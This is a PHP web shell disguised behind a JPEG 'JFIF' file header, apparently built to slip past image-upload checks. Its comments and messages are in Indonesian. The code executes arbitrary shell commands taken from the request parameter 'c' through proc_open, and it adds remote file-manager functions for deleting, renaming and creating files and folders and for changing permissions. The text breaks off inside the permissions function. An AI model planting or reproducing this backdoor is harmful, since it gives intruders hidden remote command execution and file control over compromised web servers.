���� JFIF ��
array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w")
);
$process = proc_open($input, $descriptors, $pipes);
if (is_resource($process)) {
$output = stream_get_contents($pipes[1]);
$errorOutput = stream_get_contents($pipes[2]);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
$exitCode = proc_close($process);
if ($exitCode === 0) {
return $output;
} else {
return "Error: " . $errorOutput;
}
} else {
return "↳ Tidak dapat menjalankan perintah\n";
}
}
if (isset($_REQUEST['c'])) {
$command = $_REQUEST['c'];
echo executeCommand($command);
}
// Fungsi untuk menghapus file
function delete_file($file) {
if (file_exists($file)) {
unlink($file);
echo '
File berhasil dihapus: ' . $file . '
';
} else {
echo '
File tidak ditemukan: ' . $file . '
';
}
}
// Fungsi untuk membuat folder
function create_folder($folder_name) {
if (!file_exists($folder_name)) {
mkdir($folder_name);
echo '
Folder berhasil dibuat: ' . $folder_name . '
';
} else {
echo '
Folder sudah ada: ' . $folder_name . '
';
}
}
// Fungsi untuk mengedit nama file
function rename_file($file, $new_name) {
$dir = dirname($file);
$new_file = $dir . '/' . $new_name;
if (file_exists($file)) {
if (!file_exists($new_file)) {
rename($file, $new_file);
echo '
File berhasil diubah nama menjadi: ' . $new_name . '
';
} else {
echo '
File dengan nama yang sama sudah ada: ' . $new_name . '
';
}
} else {
echo '
File tidak ditemukan: ' . $file . '
';
}
}
// Fungsi untuk mengedit nama folder
function rename_folder($folder, $new_name) {
$dir = dirname($folder);
$new_folder = $dir . '/' . $new_name;
if (file_exists($folder)) {
if (!file_exists($new_folder)) {
rename($folder, $new_folder);
echo '
Folder berhasil diubah nama menjadi: ' . $new_name . '
';
} else {
echo '
Folder dengan nama yang sama sudah ada: ' . $new_name . '
';
}
} else {
echo '
Folder tidak ditemukan: ' . $folder . '
';
}
}
// Fungsi untuk mengubah izin file
function change_permissions($file, $permissions) {
if (file_exists($file)) {
if (chmod($file, octdec($permissions))) {
echo '